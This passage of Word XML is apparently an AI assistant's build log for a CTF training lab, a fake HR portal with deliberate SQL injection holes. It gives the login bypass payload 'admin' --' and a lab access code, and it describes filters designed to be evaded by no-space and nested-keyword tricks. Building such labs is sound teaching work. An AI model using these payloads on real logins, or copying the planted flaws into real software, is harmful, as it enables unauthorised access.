                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
            <w:shd w:val="clear" w:fill="123B78"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What changed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Run the application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Verified the server starts cleanly and serves correctly.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Fix background music restarting on navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>public/sound.js: persist playback position across page loads via sessionStorage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Portal: access code question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Explained the Stage 3 gate and staging access code.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Portal: username / login question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Explained the login SQL injection and the classic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B3262A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>admin' --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Portal rework, round 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Expanded employee/user data, added a second injection point (department filter), added a reject-based login WAF requiring a no-space bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HR Portal rework, round 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Added a strip-based search WAF requiring a nested-keyword bypass — deliberately different from login’s.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full walkthrough requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Gave verified, exact solve paths for the reworked HR Portal.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full Solstice PeopleHub rebuild</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>25-table database, deterministic seed (1,000+ employees), RBAC backend, 23-page frontend, 9-flag vulnerability chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exhibit C integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rewired Stage 3 completion to the new PeopleHub investigation state.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CHALLENGE_GUIDE.md / .docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spoiler reference for Stage 3: task list, verified walkthrough, hints, architecture.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This document, v1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Combined build log + Stage 3 reference into one Word document.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>This document, v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Added full Stage 1/2/4/4½/5/6 coverage, with answers verified against the real evidence files and the server’s hash algorithm; added a Table of Contents.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2736"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Full-CTF cross-reference pass (current)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5832"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-referenced the design-source case file on disk, verified the Stage 1 video answer live against YouTube, confirmed a QR-code credential mechanic described in the design notes was never actually implemented, and enriched every stage with the original narrative detail.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Running the Application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"run"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inspected the project before touching anything: a single-file Node </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> server, zero npm dependencies, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>node:sqlite</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for one in-memory lab, session state as an in-memory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Background Music Continuity Fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"when the new page was load the music was stop and re start in fist i dot want like that i want to couninues"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Root cause: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sound.js</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> created a brand-new </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Audio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> element on every page load. Fix: persist playback position to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sessionStorage</w:t>
      </w:r>
      <w:r>
        <w:t>, restored on the next page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3–4. HR Portal Investigation (Original Build)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"i open hr poratl and they ak access code what is that" / "user name"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Traced the access code to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>challenges.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SDX-VPN-8841</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); explained the login SQLi and gave </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>admin' --</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. HR Portal Rework — Round 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"rework the hr portal i want to exactly how the hr portal have like that crete some users and make it more complecate"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Expanded employee directory 5→15, HR accounts 2→4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Added a second, independent injection point (Department filter).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Added a reject-based login WAF; bypass = no-space-around-keyword technique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. HR Portal Rework — Round 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"how to hardrn so make it more hard"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Added a strip-based search WAF; bypass = nested-keyword reconstruction, deliberately different from login’s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Emergent finding, verified not assumed: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> resists the nesting trick (same-character collapse).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A separate order-dependent bypass reconstructs </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B3262A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> through the Search field specifically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7–11. The PeopleHub Rebuild, Integration, and Documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="160"/>
        <w:shd w:val="clear" w:fill="E8EFFC"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="123B78"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>An 85-section specification for a complete synthetic enterprise HR platform, followed by: "yes do continue until full finished dont ask me."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Full detail on this phase — architecture decision, all six build phases, bugs found and fixed, and end-to-end verification — is in the earlier project log section; see Part II above for the finished system’s complete technical reference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bug fixed:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> announcement generator capped at 30 rows instead of 52+ (title-list exhaustion).</w:t>
      </w:r>
